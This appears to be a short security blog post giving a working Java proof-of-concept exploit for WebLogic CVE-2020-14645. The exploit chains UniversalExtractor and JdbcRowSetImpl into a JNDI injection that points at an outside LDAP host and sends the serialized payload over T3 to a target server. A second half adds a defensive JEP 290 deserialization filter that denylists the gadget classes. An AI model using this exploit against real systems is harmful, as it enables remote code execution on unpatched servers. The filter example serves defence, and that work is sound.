UniversalExtractor can invoke arbitrary get/is methods, which leads to JNDI injection.
```java
package com.supeream;

import com.sun.rowset.JdbcRowSetImpl;
import com.supeream.serial.Reflections;
import com.supeream.serial.Serializables;
import com.supeream.weblogic.T3ProtocolOperation;
import com.tangosol.util.comparator.ExtractorComparator;
import com.tangosol.util.extractor.UniversalExtractor;

import java.util.PriorityQueue;

public class CVE_2020_14645 {
    public static void main(String[] args) throws Exception {
        // CVE_2020_14645
        // The extractor names the getter that is invoked on each compared element.
        UniversalExtractor extractor = new UniversalExtractor("getDatabaseMetaData()", null, 1);
        final ExtractorComparator comparator = new ExtractorComparator(extractor);

        // JdbcRowSetImpl resolves its data source name through JNDI.
        JdbcRowSetImpl rowSet = new JdbcRowSetImpl();
        rowSet.setDataSourceName("ldap://172.16.2.1:1389/#Calc");
        final PriorityQueue<Object> queue = new PriorityQueue<Object>(2, comparator);

        // Fill the queue by reflection so the comparator does not run locally.
        Object[] q = new Object[]{rowSet, rowSet};
        Reflections.setFieldValue(queue, "queue", q);
        Reflections.setFieldValue(queue, "size", 2);
        byte[] payload = Serializables.serialize(queue);
        T3ProtocolOperation.send("172.16.2.132", "7001", payload);
    }
}
```
Tested on jdk8u121, weblogic12.2.1.4.
This extends to CVE-2020-14625.
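On the defensive side, a JEP 290 deserialization filter can refuse the classes this chain depends on before any of their code runs. The following is an added example, not part of the original post or of WebLogic/Coherence; the class name `GadgetFilterDemo` and the sample inputs are constructed, and it assumes Java 9 or later (`java.io.ObjectInputFilter`).

```java
import java.io.*;
import javax.sql.rowset.RowSetProvider;

public class GadgetFilterDemo {
    // Classes named in the PoC above, in serial-filter pattern syntax ("!" = reject).
    static final String PATTERN =
          "!com.tangosol.util.extractor.UniversalExtractor;"
        + "!com.tangosol.util.comparator.ExtractorComparator;"
        + "!com.sun.rowset.JdbcRowSetImpl";

    // Deserialize with the filter attached to this one stream.
    static Object readFiltered(byte[] data) throws IOException, ClassNotFoundException {
        ObjectInputFilter filter = ObjectInputFilter.Config.createFilter(PATTERN);
        try (ObjectInputStream in = new ObjectInputStream(new ByteArrayInputStream(data))) {
            in.setObjectInputFilter(filter);
            return in.readObject();
        }
    }

    static byte[] serialize(Object o) throws IOException {
        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        try (ObjectOutputStream out = new ObjectOutputStream(bos)) {
            out.writeObject(o);
        }
        return bos.toByteArray();
    }

    public static void main(String[] args) throws Exception {
        // Constructed sample 1: a harmless value passes (no pattern matches it).
        System.out.println("String -> " + readFiltered(serialize("hello")));

        // Constructed sample 2: an unconfigured JdbcRowSetImpl obtained from the
        // public factory API; it has no data source name and is inert.
        byte[] rowSet = serialize(RowSetProvider.newFactory().createJdbcRowSet());
        try {
            readFiltered(rowSet);
            System.out.println("JdbcRowSetImpl -> accepted (filter not effective)");
        } catch (InvalidClassException e) {
            // Thrown while the class descriptor is read, before the object exists.
            System.out.println("JdbcRowSetImpl -> rejected: " + e.getMessage());
        }
    }
}
```

The same pattern string is accepted by the JVM-wide `jdk.serialFilter` property. A denylist only covers classes already known to be abused, so an allowlist pattern ending in `!*` is the stricter choice where the set of expected classes is known.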
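My writing is poor, my wording flippant, the content shallow, and my technique unpracticed. Pointers and corrections from the experts on any shortcomings are welcome and greatly appreciated.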